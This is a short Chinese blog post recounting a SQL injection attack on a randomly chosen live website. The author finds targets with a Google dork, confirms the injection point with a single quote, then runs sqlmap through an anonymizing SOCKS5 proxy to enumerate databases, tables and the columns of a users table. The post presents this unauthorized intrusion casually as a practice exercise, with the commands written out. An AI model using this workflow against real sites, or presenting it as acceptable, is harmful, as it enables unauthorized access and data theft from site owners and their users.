Pumpkin-Man

活到老_学到老!

0%

记一次简单的SQL实战test

一次无趣的记录

  • 打开chrome浏览器

    • 在搜索上缓缓打出:inurl:show_news.php?id
    • 随机乱点一通 好吧 就是您了
  • 缓缓在URL参数后打出一个单引号

    • em…..

      wyGo4J.png

    • 可以从网页报错的信息得出 输入的单引号带入到服务器后端进行了处理 但因为语法不对 从后端文件返回出一个语法报错的信息 由此得出 此处可能存在字符型注入

    • 既然如此 利用神器SQLMAP跑出它的数据库

    • sqlmap.py -u http://****/show_news.php?ID=44 --proxy=socks5://40.76.13.223:1080 --dbs

      wyGshj.png

    • 某个库中的所有表

    • sqlmap.py -u http://****/show_news.php?ID=44 --proxy=socks5://40.76.13.223:1080 -D “库名” --tables

      wyrDER.png

    • 获取users表中字段

      wyG0HS.png

    • 到了这就此打住了 可惜current user is DBA: False 溜了溜了